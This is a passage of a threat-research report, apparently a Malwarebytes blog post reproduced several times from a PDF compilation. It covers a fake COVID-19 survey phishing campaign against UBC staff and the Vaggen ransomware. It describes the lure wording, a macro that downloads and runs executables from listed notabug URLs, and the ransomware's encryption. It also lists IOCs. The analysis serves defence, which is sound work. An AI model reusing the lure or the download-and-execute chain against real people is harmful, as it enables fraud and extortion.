bout/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1186 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1187 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1188 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir\r\nmain_ELDBJORT -\u003e main_encryptFile\r\nmain_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Go library function path/filepath.Walk.\r\nFiles are encrypted with AES-256 (32-byte key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom; the file content is encrypted with the gcm.Seal function.\r\nThe content of the output file (with the .VAGGEN extension) contains:\r\nthe 12-byte nonce\r\nthe encrypted content\r\nthe 16-byte GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint a better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nIOCs\r\n
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims who want to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1198 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1199 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1200 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD, to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’. Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming the files is implemented as the callback of the standard Go library function filepath.Walk (package path/filepath).

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption algorithm is similar to the one demonstrated here: it uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom, and the file content is encrypted with the gcm.Seal function.

The output file (with the .VAGGEN extension) contains:

the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.

Crawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1238 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1239 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1240 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1241 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1242 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1243 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1244 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1245 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1246 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1247 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. 
Please fill it out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!\r\nAccording to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file since it was shared privately, instead of publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the Shell function to execute killar.exe\r\nChecks the return value of the Shell function to determine whether it was successful (on success, the return value is the task ID of the executed application)\r\nIf successful, it sends an HTTP GET request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends an HTTP GET request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir\r\nmain_ELDBJORT -\u003e main_encryptFile\r\nmain_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of XXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function: path.filepath.Walk.\r\nFiles are encrypted with AES-256 (32-byte key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12-byte nonce\r\nthe encrypted content\r\nthe 16-byte GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint a better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nIOCs\r\n
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1276 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1277 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1278 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
